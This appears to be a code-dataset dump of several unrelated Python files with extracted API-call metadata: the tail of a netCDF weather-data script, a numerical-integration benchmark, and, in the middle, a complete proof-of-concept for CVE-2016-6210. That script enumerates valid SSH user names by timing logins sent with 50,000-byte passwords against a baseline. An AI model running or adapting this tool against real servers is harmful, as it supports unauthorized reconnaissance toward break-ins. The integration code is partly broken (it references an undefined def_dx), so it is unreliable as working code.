log\n'), ((1341, 1393), 'log.info', 'log.info', (['log_file', 'f"""Adding absolute wind velocity"""'], {}), "(log_file, f'Adding absolute wind velocity')\n", (1349, 1393), False, 'import log\n'), ((1999, 2072), 'utilities.get_ncfiles_in_time_range', 'get_ncfiles_in_time_range', (['input_dir', 'date0', 'date0'], {'timeformat': 'timeformat'}), '(input_dir, date0, date0, timeformat=timeformat)\n', (2024, 2072), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((2303, 2338), 'netCDF4.Dataset', 'Dataset', (['(input_dir + nc_file_add[0])'], {}), '(input_dir + nc_file_add[0])\n', (2310, 2338), False, 'from netCDF4 import Dataset\n'), ((3627, 3694), 'log.info', 'log.info', (['log_file', 'f"""File already exists, skipping: {output_path}"""'], {}), "(log_file, f'File already exists, skipping: {output_path}')\n", (3635, 3694), False, 'import log\n'), ((3956, 4016), 'datetime.datetime', 'datetime', (['ncfile_datetime.year', '(ncfile_datetime.month + 1)', '(1)'], {}), '(ncfile_datetime.year, ncfile_datetime.month + 1, 1)\n', (3964, 4016), False, 'from datetime import datetime\n'), ((4041, 4116), 'utilities.get_ncfiles_in_time_range', 'get_ncfiles_in_time_range', (['input_dir', 'start_date', 'end_date'], {'including_end': '(0)'}), '(input_dir, start_date, end_date, including_end=0)\n', (4066, 4116), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((4151, 4208), 'datetime.datetime', 'datetime', (['ncfile_datetime.year', 'ncfile_datetime.month', '(31)'], {}), '(ncfile_datetime.year, ncfile_datetime.month, 31)\n', (4159, 4208), False, 'from datetime import datetime\n'), ((4235, 4310), 'utilities.get_ncfiles_in_time_range', 'get_ncfiles_in_time_range', (['input_dir', 'start_date', 'end_date'], {'including_end': '(1)'}), '(input_dir, start_date, end_date, including_end=1)\n', (4260, 4310), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((4516, 4553), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfiles_merge[i])'], {}), '(input_dir + ncfiles_merge[i])\n', (4523, 4553), False, 'from netCDF4 import Dataset\n'), ((6055, 6082), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfile)'], {}), '(input_dir + ncfile)\n', (6062, 6082), False, 'from netCDF4 import Dataset\n'), ((8572, 8607), 'numpy.nanmean', 'np.nanmean', (['quantity.values'], {'axis': '(0)'}), '(quantity.values, axis=0)\n', (8582, 8607), True, 'import numpy as np\n'), ((2508, 2572), 'log.info', 'log.info', (['log_file', 'f"""Adding variable {variable_name} to netcdf"""'], {}), "(log_file, f'Adding variable {variable_name} to netcdf')\n", (2516, 2572), False, 'import log\n'), ((2599, 2640), 'modeldata.netcdf_to_quantity', 'netcdf_to_quantity', (['netcdf', 'variable_name'], {}), '(netcdf, variable_name)\n', (2617, 2640), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((4700, 4773), 'log.info', 'log.info', (['log_file', 'f"""Appending data from {input_dir + ncfiles_merge[i]}"""'], {}), "(log_file, f'Appending data from {input_dir + ncfiles_merge[i]}')\n", (4708, 4773), False, 'import log\n'), ((6131, 6205), 'modeldata.netcdf_to_quantity', 'netcdf_to_quantity', (['netcdf', 'variable'], {'new_name': 'variable', 'i_depths': 'i_depths'}), '(netcdf, variable, new_name=variable, i_depths=i_depths)\n', (6149, 6205), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((6253, 6327), 'modeldata.netcdf_to_quantity', 'netcdf_to_quantity', (['netcdf', 'variable'], {'new_name': 'variable', 'i_depths': 'i_depths'}), '(netcdf, variable, new_name=variable, i_depths=i_depths)\n', (6271, 6327), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((6359, 6422), 'numpy.concatenate', 'np.concatenate', (['(quantity.values, next_quantity.values)'], {'axis': '(0)'}), '((quantity.values, next_quantity.values), axis=0)\n', (6373, 6422), True, 'import numpy as np\n'), ((7894, 7918), 'os.path.splitext', 'os.path.splitext', (['ncfile'], {}), '(ncfile)\n', (7910, 7918), False, 'import os\n'), ((8033, 8060), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfile)'], {}), '(input_dir + ncfile)\n', (8040, 8060), False, 'from netCDF4 import Dataset\n'), ((7938, 7988), 'datetime.datetime.strptime', 'datetime.strptime', (['ncfile_datestr', 'filename_format'], {}), '(ncfile_datestr, filename_format)\n', (7955, 7988), False, 'from datetime import datetime\n'), ((8125, 8199), 'modeldata.netcdf_to_quantity', 'netcdf_to_quantity', (['netcdf', 'variable'], {'new_name': 'variable', 'i_depths': 'i_depths'}), '(netcdf, variable, new_name=variable, i_depths=i_depths)\n', (8143, 8199), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((8263, 8337), 'modeldata.netcdf_to_quantity', 'netcdf_to_quantity', (['netcdf', 'variable'], {'new_name': 'variable', 'i_depths': 'i_depths'}), '(netcdf, variable, new_name=variable, i_depths=i_depths)\n', (8281, 8337), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((8377, 8440), 'numpy.concatenate', 'np.concatenate', (['(quantity.values, next_quantity.values)'], {'axis': '(0)'}), '((quantity.values, next_quantity.values), axis=0)\n', (8391, 8440), True, 'import numpy as np\n'), ((7646, 7670), 'datetime.datetime', 'datetime', (['(1900)', 'month', '(1)'], {}), '(1900, month, 1)\n', (7654, 7670), False, 'from datetime import datetime\n'), ((7669, 7689), 'datetime.datetime', 'datetime', (['(1900)', '(1)', '(1)'], {}), '(1900, 1, 1)\n', (7677, 7689), False, 'from datetime import datetime\n'), ((7521, 7545), 'datetime.datetime', 'datetime', (['(1900)', 'month', '(1)'], {}), '(1900, month, 1)\n', (7529, 7545), False, 'from datetime import datetime\n')]
|
#!/usr/bin/python
#
# CVEs: CVE-2016-6210 (Credits for this go to <NAME>)
#
# Author: 0_o -- null_null
# nu11.nu11 [at] yahoo.com
# Oh, and it is n-u-one-one.n-u-one-one, no l's...
# Wonder how the guys at packet storm could get this wrong :(
#
# Date: 2016-07-19
#
# Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210.
#
# Prerequisites: Network access to the SSH daemon.
#
# DISCLAIMER: Use against your own hosts only! Attacking stuff you are not
# permitted to may put you in big trouble!
#
# And now - the fun part :-)
#
import paramiko
import time
import numpy
import argparse
import sys
args = None
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def get_args():
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group()
parser.add_argument("host", type = str, help = "Give SSH server address like ip:port or just by ip")
group.add_argument("-u", "--user", type = str, help = "Give a single user name")
group.add_argument("-U", "--userlist", type = str, help = "Give a file containing a list of users")
parser.add_argument("-e", "--enumerated", action = "store_true", help = "Only show enumerated users")
parser.add_argument("-s", "--silent", action = "store_true", help = "Like -e, but just the user names will be written to stdout (no banner, no anything)")
parser.add_argument("--bytes", default = 50000, type = int, help = "Send so many BYTES to the SSH daemon as a password")
parser.add_argument("--samples", default = 12, type = int, help = "Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users")
parser.add_argument("--factor", default = 3.0, type = float, help = "Used to compute the upper timing boundary for user enumeration")
parser.add_argument("--trials", default = 1, type = int, help = "try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary")
args = parser.parse_args()
return args
def get_banner(host, port):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = '<PASSWORD>')
except:
banner = ssh.get_transport().remote_version
ssh.close()
return banner
def connect(host, port, user):
global args
starttime = 0.0
endtime = 0.0
p = 'B' * int(args.bytes)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
starttime=time.clock()
try:
ssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False)
except:
endtime=time.clock()
finally:
ssh.close()
return endtime - starttime
def main():
global args
args = get_args()
if not args.silent: print("\n\nUser name enumeration against SSH daemons affected by CVE-2016-6210")
if not args.silent: print("Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by <NAME>\n\n")
if args.host:
host = args.host.split(":")[0]
try:
port = int(args.host.split(":")[1])
except IndexError:
port = 2222
users = []
if args.user:
users.append(args.user)
elif args.userlist:
with open(args.userlist, "r") as f:
users = f.readlines()
else:
if not args.silent: print(bcolors.FAIL + "[!] " + bcolors.ENDC + "You must give a user or a list of users")
sys.exit()
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing SSHD at: " + bcolors.BOLD + str(host) + ":" + str(port) + bcolors.ENDC + ", Banner: " + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC)
# get baseline timing for non-existing users...
baseline_samples = []
baseline_mean = 0.0
baseline_deviation = 0.0
if not args.silent: sys.stdout.write(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Getting baseline timing for authenticating non-existing users")
for i in range(1, int(args.samples) + 1):
if not args.silent: sys.stdout.write('.')
if not args.silent: sys.stdout.flush()
sample = connect(host, port, 'foobar-bleh-nonsense' + str(i))
baseline_samples.append(sample)
if not args.silent: sys.stdout.write('\n')
# remove the biggest and smallest value
baseline_samples.sort()
baseline_samples.pop()
baseline_samples.reverse()
baseline_samples.pop()
# do math
baseline_mean = numpy.mean(numpy.array(baseline_samples))
baseline_deviation = numpy.std(numpy.array(baseline_samples))
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline mean for host " + host + " is " + str(baseline_mean) + " seconds.")
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline variation for host " + host + " is " + str(baseline_deviation) + " seconds.")
upper = baseline_mean + float(args.factor) * baseline_deviation
if not args.silent: print(bcolors.WARNING + "[*] " + bcolors.ENDC + "Defining timing of x < " + str(upper) + " as non-existing user.")
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing your users...")
#
# Get timing for the given user name...
#
for u in users:
user = u.strip()
enum_samples = []
enum_mean = 0.0
for t in range(0, int(args.trials)):
timeval = connect(host, port, user)
enum_samples.append(timeval)
enum_mean = numpy.mean(numpy.array(enum_samples))
if (enum_mean < upper):
if not (args.enumerated or args.silent) :
print(bcolors.FAIL + "[-] " + bcolors.ENDC + user + " - timing: " + str(enum_mean))
else:
if not args.silent:
print(bcolors.OKGREEN + "[+] " + bcolors.ENDC + user + " - timing: " + str(enum_mean))
else:
print(user)
if __name__ == "__main__":
main()
|
[
"sys.stdout.write",
"paramiko.SSHClient",
"argparse.ArgumentParser",
"time.clock",
"numpy.array",
"sys.stdout.flush",
"paramiko.AutoAddPolicy",
"sys.exit"
] |
[((1074, 1099), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (1097, 1099), False, 'import argparse\n'), ((2395, 2415), 'paramiko.SSHClient', 'paramiko.SSHClient', ([], {}), '()\n', (2413, 2415), False, 'import paramiko\n'), ((2814, 2834), 'paramiko.SSHClient', 'paramiko.SSHClient', ([], {}), '()\n', (2832, 2834), False, 'import paramiko\n'), ((2909, 2921), 'time.clock', 'time.clock', ([], {}), '()\n', (2919, 2921), False, 'import time\n'), ((2451, 2475), 'paramiko.AutoAddPolicy', 'paramiko.AutoAddPolicy', ([], {}), '()\n', (2473, 2475), False, 'import paramiko\n'), ((2870, 2894), 'paramiko.AutoAddPolicy', 'paramiko.AutoAddPolicy', ([], {}), '()\n', (2892, 2894), False, 'import paramiko\n'), ((4301, 4427), 'sys.stdout.write', 'sys.stdout.write', (["(bcolors.OKBLUE + '[*] ' + bcolors.ENDC +\n 'Getting baseline timing for authenticating non-existing users')"], {}), "(bcolors.OKBLUE + '[*] ' + bcolors.ENDC +\n 'Getting baseline timing for authenticating non-existing users')\n", (4317, 4427), False, 'import sys\n'), ((4687, 4709), 'sys.stdout.write', 'sys.stdout.write', (['"""\n"""'], {}), "('\\n')\n", (4703, 4709), False, 'import sys\n'), ((4905, 4934), 'numpy.array', 'numpy.array', (['baseline_samples'], {}), '(baseline_samples)\n', (4916, 4934), False, 'import numpy\n'), ((4970, 4999), 'numpy.array', 'numpy.array', (['baseline_samples'], {}), '(baseline_samples)\n', (4981, 4999), False, 'import numpy\n'), ((3153, 3165), 'time.clock', 'time.clock', ([], {}), '()\n', (3163, 3165), False, 'import time\n'), ((3918, 3928), 'sys.exit', 'sys.exit', ([], {}), '()\n', (3926, 3928), False, 'import sys\n'), ((4494, 4515), 'sys.stdout.write', 'sys.stdout.write', (['"""."""'], {}), "('.')\n", (4510, 4515), False, 'import sys\n'), ((4541, 4559), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (4557, 4559), False, 'import sys\n'), ((5895, 5920), 'numpy.array', 'numpy.array', (['enum_samples'], {}), '(enum_samples)\n', (5906, 5920), False, 'import numpy\n')]
|
import Rate_calculation
#import constants as ct
from mpmath import mp
from mpmath import fp
import numpy as np
import scipy.integrate as spint
import time
methods=["mp-gl", "mp-ts", "fp-gl", "fp-ts", "sp-quad", "sp-gauss", "monte-carlo", "w-cumsum", "sp-simps", "romberg"];
#cumtrapz relative error tolerance
err_rel=1e-1;
def_nodes=1e2; #default number of nodes
maxloop=100;
# general integration method
# syntax is mpmath like, set the limits you dont want to integrate over to 0
#
def integrate(f, limx, limy, limz, method):
if method=="mp-gl":
if limz!=0:
return mp.quad(f, limx, limy, limz, method="gauss-legendre");
else:
if limy!=0:
return mp.quad(f, limx, limy, method="gauss-legendre");
else:
return mp.quad(f, limx, method="gauss-legendre");
elif method=="mp-ts":
if limz!=0:
return mp.quad(f, limx, limy, limz, method="tanh-sinh");
else:
if limy!=0:
return mp.quad(f, limx, limy, method="tanh-sinh");
else:
return mp.quad(f, limx, method="tanh-sinh");
elif method=="fp-gl":
if limz!=0:
return fp.quad(f, limx, limy, limz, method="gauss-legendre");
else:
if limy!=0:
return fp.quad(f, limx, limy, method="gauss-legendre");
else:
return fp.quad(f, limx, method="gauss-legendre");
elif method=="fp-ts":
if limz!=0:
return fp.quad(f, limx, limy, limz, method="tanh-sinh");
else:
if limy!=0:
return fp.quad(f, limx, limy, method="tanh-sinh");
else:
return fp.quad(f, limx, method="tanh-sinh");
elif method=="sp-quad":
if limz!=0:
return spint.tplquad(f, limz[0], limz[1], limy[0], limy[1], limx[0], limx[1])[0];
else:
if limy!=0:
return spint.dblquad(f, limy[0], limy[1], limx[0], limx[1])[0];
else:
return spint.quad(f, limx[0], limx[1])[0];
elif method=="romberg":
if not np.ndim(limx)==0:
limx=[float(limx[0]), float(limx[1])];
if not np.ndim(limy)==0:
limy=[float(limy[0]), float(limy[1])];
if not np.ndim(limz)==0:
limz=[float(limz[0]), float(limz[1])];
reltol=1e-16;
abstol=1e-16;
if limz!=0:
return spint.romberg(lambda z: spint.romberg(lambda y: spint.romberg(lambda x: float(f(x,y,z)), limx[0], limx[1], tol=abstol, rtol=reltol), limy[0], limy[1], tol=abstol, rtol=reltol), limz[0], limz[1], tol=abstol, rtol=reltol);
else:
if limy!=0:
return spint.romberg(lambda y: spint.romberg(lambda x: float(f(x,y)), limx[0], limy[1], tol=abstol, rtol=reltol), limy[0], limy[1], tol=abstol, rtol=reltol);
else:
return spint.romberg(lambda x: float(f(x)), limx[0], limx[1], tol=abstol, rtol=reltol);
#currently broken, but slow so unused
elif method=="sp-gauss":
if not np.ndim(limx)==0:
limx=[float(limx[0]), float(limx[1])];
if not np.ndim(limy)==0:
limy=[float(limy[0]), float(limy[1])];
if not np.ndim(limz)==0:
limz=[float(limz[0]), float(limz[1])];
order=7;
if limz!=0:
return spint.fixed_quad(lambda z: spint.fixed_quad(lambda y: spint.fixed_quad(lambda x: f(x,y,z), limx[0], limx[1], n=order)[0], limy[0], limy[1], n=order)[0], limz[0], limz[1], n=order)[0];
else:
if limy!=0:
return spint.fixed_quad(lambda y: spint.romberg(lambda x: f(x,y), limx[0], limy[1], n=order)[0], limy[0], limy[1], n=order)[0];
else:
return spint.fixed_quad(lambda x: f(x), limx[0], limx[1], n=order)[0];
elif method=="w-cumsum":
if not np.ndim(limx)==0:
limx=[float(limx[0]), float(limx[1])];
if not np.ndim(limy)==0:
limy=[float(limy[0]), float(limy[1])];
if not np.ndim(limz)==0:
limz=[float(limz[0]), float(limz[1])];
if limz!=0:
dx=(limx[1]-limx[0])/def_nodes;
dy=(limy[1]-limy[0])/def_nodes;
dz=(limz[1]-limz[0])/def_nodes;
loop=0;
lastres=0;
while True:
xl=np.arange(limx[0], limx[1], dx);
yl=np.arange(limy[0], limy[1], dy);
zl=np.arange(limz[0], limz[1], dz);
X, Y, Z=np.meshgrid(xl, yl, zl);
fx=[];
for i in range(0, len(X)):
fy=[];
for j in range(0, len(Y)):
fz=[];
for k in range(0, len(Z)):
fz.append(f(X[i][j][k], Y[i][j][k], zl[k]));
fy.append(spint.simps(fz, dx=dz));
fx.append(spint.simps(fy, dx=dy));
res=spint.simps(fx, dx=dx);
if loop!=0:
if np.abs(res-lastres)/res < err_rel:
return res;
else:
ad=(1/2)**loop; #linear to begin with
dx=dx*ad;
dy=dy*ad;
dz=dz*ad;
lastres=res;
if loop > maxloop:
break;
loop+=1;
else:
if limy!=0:
dx=def_dx;
dy=def_dx;
loop=0;
lastres=0;
while True:
xl=np.arange(limx[0], limx[1], dx);
yl=np.arange(limy[0], limy[1], dy);
X, Y=np.meshgrid(xl, yl);
fx=[];
for i in range(0, len(X)):
fy=[];
for j in range(0, len(Y)):
fy.append(f(X[i][j], yl[j]));
fx.append(spint.simps(fy, dx=dy));
res=spint.simps(fx, dx=dx);
if loop!=0:
if np.abs(res-lastres)/res < err_rel:
return res;
else:
ad=(1/2)**loop; #linear to begin with
dx=dx*ad;
dy=dy*ad;
lastres=res;
if loop > maxloop:
break;
loop+=1;
else:
dx=def_dx;
loop=0;
lastres=0;
while True:
xl=np.arange(limx[0], limx[1], dx);
fx=[];
for i in range(0, len(X)):
fx.append(f(xl[i]));
res=spint.simps(fx, dx=dx);
if loop!=0:
if np.abs(res-lastres)/res < err_rel:
return res;
else:
ad=(1/2)**loop; #linear to begin with
dx=dx*ad;
lastres=res;
if loop > maxloop:
break;
loop+=1;
#still a bit broken but proved slower than mp-gl
elif method=="monte-carlo":
N=int(1e6);
if limz!=0:
N=int(round(N**(1/3)));
x=np.random.rand(N)*(limx[1]-limx[0])+limx[0];
y=np.random.rand(N)*(limy[1]-limy[0])+limy[0];
z=np.random.rand(N)*(limz[1]-limy[0])+limz[0];
X,Y,Z=np.meshgrid(x,y,z);
fxyz=[];
for i in range(0, len(X)):
fxy=[];
for j in range(0, len(Y)):
fx=[];
for k in range(0, len(Z)):
fx.append(f(X[i][j][k], Y[i][j][k], Z[i][j][k]));
fxy.append(fx);
fxyz.append(fxy);
wmax=np.max(fxyz);
wmin=np.min(fxyz);
W=np.random.rand(N, N, N)*(wmax-wmin)+wmin;
est=0;
for i in range(0, len(fxyz)):
for j in range(0, len(fxyz[i])):
for k in range(0, len(fxyz[i][j])):
if W[i][j][k] > 0 and W[i][j][k] < fxyz[i][j][k]:
est=est+fxyz[i][j][k];
elif W[i][j][k] < 0 and W[i][j][k] > fxyz[i][j][k]:
est=est+fxyz[i][j][k];
return (est/(N**3))*(limx[1]-limx[0])*(limy[1]-limy[0])*(limz[1]-limz[0])*(wmax-wmin);
else:
if limy!=0:
N=int(round(N**(1/2)));
x=np.random.rand(N)*(limx[1]-limx[0])+limx[0];
y=np.random.rand(N)*(limy[1]-limy[0])+limy[0];
X,Y=np.meshgrid(x,y);
fxy=[];
for i in range(0, len(X)):
fx=[];
for j in range(0, len(Y)):
fx.append(f(X[i][j], Y[i][j]));
fxy.append(fx);
zmax=np.max(fxy);
zmin=np.min(fxy);
Z=np.random.rand(N, N)*(zmax-zmin)+zmin;
est=0;
for i in range(0, len(fxy)):
for j in range(0, len(fxy[i])):
if Z[i][j] > 0 and Z[i][j] < fxy[i][j]:
est=est+fxy[i][j];
elif Z[i][j] < 0 and Z[i][j] > fxy[i][j]:
est=est+fxy[i][j];
return (est/(N**2))*(limx[1]-limx[0])*(limy[1]-limy[0])*(zmax-zmin);
else:
X=np.random.rand(N)*(limx[1]-limx[0])+limx[0];
fx=[];
for i in range(0, len(X)):
fx.append(f(X[i]));
ymax=np.max(fx);
ymin=np.min(fx);
Y=np.random.rand(N)*(ymax-ymin)+ymin;
est=0;
for i in range(0, len(fx)):
if Y[i] > 0 and Y[i] < fx[i]:
est=est+fx[i];
elif Y[i] < 0 and Y[i] > fx[i]:
est=est+fx[i];
return (est/N)*(limx[1]-limx[0])*(ymax-ymin);
#preallocated, expected to be slow
elif method=="sp-simps":
if limz!=0:
dx=(limx[1]-limx[0])/def_nodes;
dy=(limy[1]-limy[0])/def_nodes;
dz=(limz[1]-limz[0])/def_nodes;
loop=0;
lastres=0;
while True:
xl=np.arange(limx[0], limx[1], dx);
yl=np.arange(limy[0], limy[1], dy);
zl=np.arange(limz[0], limz[1], dz);
X, Y, Z=np.meshgrid(xl, yl, zl);
fx=[];
for i in range(0, len(X)):
fy=[];
for j in range(0, len(Y)):
fz=[];
for k in range(0, len(Z)):
fz.append(f(X[i][j][k], Y[i][j][k], zl[k]));
fy.append(spint.simps(fz, dx=dz));
fx.append(spint.simps(fy, dx=dy));
res=spint.simps(fx, dx=dx);
if loop!=0:
if np.abs(res-lastres)/res < err_rel:
return res;
else:
ad=(1/2)**loop; #linear to begin with
dx=dx*ad;
dy=dy*ad;
dz=dz*ad;
lastres=res;
if loop > maxloop:
break;
loop+=1;
else:
if limy!=0:
dx=def_dx;
dy=def_dx;
loop=0;
lastres=0;
while True:
xl=np.arange(limx[0], limx[1], dx);
yl=np.arange(limy[0], limy[1], dy);
X, Y=np.meshgrid(xl, yl);
fx=[];
for i in range(0, len(X)):
fy=[];
for j in range(0, len(Y)):
fy.append(f(X[i][j], yl[j]));
fx.append(spint.simps(fy, dx=dy));
res=spint.simps(fx, dx=dx);
if loop!=0:
if np.abs(res-lastres)/res < err_rel:
return res;
else:
ad=(1/2)**loop; #linear to begin with
dx=dx*ad;
dy=dy*ad;
lastres=res;
if loop > maxloop:
break;
loop+=1;
else:
dx=def_dx;
loop=0;
lastres=0;
while True:
xl=np.arange(limx[0], limx[1], dx);
fx=[];
for i in range(0, len(X)):
fx.append(f(xl[i]));
res=spint.simps(fx, dx=dx);
if loop!=0:
if np.abs(res-lastres)/res < err_rel:
return res;
else:
ad=(1/2)**loop; #linear to begin with
dx=dx*ad;
lastres=res;
if loop > maxloop:
break;
loop+=1;
return res;
#benchmarking
def benchmark():
f=lambda x,y,z: x**2*y**2-x**2*z;
for m in methods:
t=time.time();
r=integrate(f, [0, 1], 0, 0, m);
print("Method: "+m+" Time: "+str(time.time()-t)+" Result: "+str(r));
if __name__=="__main__":
benchmark();
|
[
"numpy.meshgrid",
"numpy.abs",
"mpmath.mp.quad",
"scipy.integrate.quad",
"mpmath.fp.quad",
"numpy.ndim",
"scipy.integrate.tplquad",
"time.time",
"numpy.max",
"numpy.min",
"numpy.arange",
"scipy.integrate.dblquad",
"numpy.random.rand",
"scipy.integrate.simps"
] |
[((14219, 14230), 'time.time', 'time.time', ([], {}), '()\n', (14228, 14230), False, 'import time\n'), ((595, 648), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx', 'limy', 'limz'], {'method': '"""gauss-legendre"""'}), "(f, limx, limy, limz, method='gauss-legendre')\n", (602, 648), False, 'from mpmath import mp\n'), ((711, 758), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx', 'limy'], {'method': '"""gauss-legendre"""'}), "(f, limx, limy, method='gauss-legendre')\n", (718, 758), False, 'from mpmath import mp\n'), ((801, 842), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx'], {'method': '"""gauss-legendre"""'}), "(f, limx, method='gauss-legendre')\n", (808, 842), False, 'from mpmath import mp\n'), ((909, 957), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx', 'limy', 'limz'], {'method': '"""tanh-sinh"""'}), "(f, limx, limy, limz, method='tanh-sinh')\n", (916, 957), False, 'from mpmath import mp\n'), ((1020, 1062), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx', 'limy'], {'method': '"""tanh-sinh"""'}), "(f, limx, limy, method='tanh-sinh')\n", (1027, 1062), False, 'from mpmath import mp\n'), ((1105, 1141), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx'], {'method': '"""tanh-sinh"""'}), "(f, limx, method='tanh-sinh')\n", (1112, 1141), False, 'from mpmath import mp\n'), ((1208, 1261), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx', 'limy', 'limz'], {'method': '"""gauss-legendre"""'}), "(f, limx, limy, limz, method='gauss-legendre')\n", (1215, 1261), False, 'from mpmath import fp\n'), ((1324, 1371), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx', 'limy'], {'method': '"""gauss-legendre"""'}), "(f, limx, limy, method='gauss-legendre')\n", (1331, 1371), False, 'from mpmath import fp\n'), ((1414, 1455), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx'], {'method': '"""gauss-legendre"""'}), "(f, limx, method='gauss-legendre')\n", (1421, 1455), False, 'from mpmath import fp\n'), ((1522, 1570), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx', 'limy', 'limz'], {'method': '"""tanh-sinh"""'}), "(f, limx, limy, limz, method='tanh-sinh')\n", (1529, 1570), False, 'from mpmath import fp\n'), ((1633, 1675), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx', 'limy'], {'method': '"""tanh-sinh"""'}), "(f, limx, limy, method='tanh-sinh')\n", (1640, 1675), False, 'from mpmath import fp\n'), ((1718, 1754), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx'], {'method': '"""tanh-sinh"""'}), "(f, limx, method='tanh-sinh')\n", (1725, 1754), False, 'from mpmath import fp\n'), ((1823, 1893), 'scipy.integrate.tplquad', 'spint.tplquad', (['f', 'limz[0]', 'limz[1]', 'limy[0]', 'limy[1]', 'limx[0]', 'limx[1]'], {}), '(f, limz[0], limz[1], limy[0], limy[1], limx[0], limx[1])\n', (1836, 1893), True, 'import scipy.integrate as spint\n'), ((14314, 14325), 'time.time', 'time.time', ([], {}), '()\n', (14323, 14325), False, 'import time\n'), ((1959, 2011), 'scipy.integrate.dblquad', 'spint.dblquad', (['f', 'limy[0]', 'limy[1]', 'limx[0]', 'limx[1]'], {}), '(f, limy[0], limy[1], limx[0], limx[1])\n', (1972, 2011), True, 'import scipy.integrate as spint\n'), ((2057, 2088), 'scipy.integrate.quad', 'spint.quad', (['f', 'limx[0]', 'limx[1]'], {}), '(f, limx[0], limx[1])\n', (2067, 2088), True, 'import scipy.integrate as spint\n'), ((2137, 2150), 'numpy.ndim', 'np.ndim', (['limx'], {}), '(limx)\n', (2144, 2150), True, 'import numpy as np\n'), ((2221, 2234), 'numpy.ndim', 'np.ndim', (['limy'], {}), '(limy)\n', (2228, 2234), True, 'import numpy as np\n'), ((2305, 2318), 'numpy.ndim', 'np.ndim', (['limz'], {}), '(limz)\n', (2312, 2318), True, 'import numpy as np\n'), ((3101, 3114), 'numpy.ndim', 'np.ndim', (['limx'], {}), '(limx)\n', (3108, 3114), True, 'import numpy as np\n'), ((3185, 3198), 'numpy.ndim', 'np.ndim', (['limy'], {}), '(limy)\n', (3192, 3198), True, 'import numpy as np\n'), ((3269, 3282), 'numpy.ndim', 'np.ndim', (['limz'], {}), '(limz)\n', (3276, 3282), True, 'import numpy as np\n'), ((3912, 3925), 'numpy.ndim', 'np.ndim', (['limx'], {}), '(limx)\n', (3919, 3925), True, 'import numpy as np\n'), ((3996, 4009), 'numpy.ndim', 'np.ndim', (['limy'], {}), '(limy)\n', (4003, 4009), True, 'import numpy as np\n'), ((4080, 4093), 'numpy.ndim', 'np.ndim', (['limz'], {}), '(limz)\n', (4087, 4093), True, 'import numpy as np\n'), ((4389, 4420), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (4398, 4420), True, 'import numpy as np\n'), ((4441, 4472), 'numpy.arange', 'np.arange', (['limy[0]', 'limy[1]', 'dy'], {}), '(limy[0], limy[1], dy)\n', (4450, 4472), True, 'import numpy as np\n'), ((4493, 4524), 'numpy.arange', 'np.arange', (['limz[0]', 'limz[1]', 'dz'], {}), '(limz[0], limz[1], dz)\n', (4502, 4524), True, 'import numpy as np\n'), ((4551, 4574), 'numpy.meshgrid', 'np.meshgrid', (['xl', 'yl', 'zl'], {}), '(xl, yl, zl)\n', (4562, 4574), True, 'import numpy as np\n'), ((5006, 5028), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (5017, 5028), True, 'import scipy.integrate as spint\n'), ((7934, 7954), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y', 'z'], {}), '(x, y, z)\n', (7945, 7954), True, 'import numpy as np\n'), ((8330, 8342), 'numpy.max', 'np.max', (['fxyz'], {}), '(fxyz)\n', (8336, 8342), True, 'import numpy as np\n'), ((8361, 8373), 'numpy.min', 'np.min', (['fxyz'], {}), '(fxyz)\n', (8367, 8373), True, 'import numpy as np\n'), ((9197, 9214), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {}), '(x, y)\n', (9208, 9214), 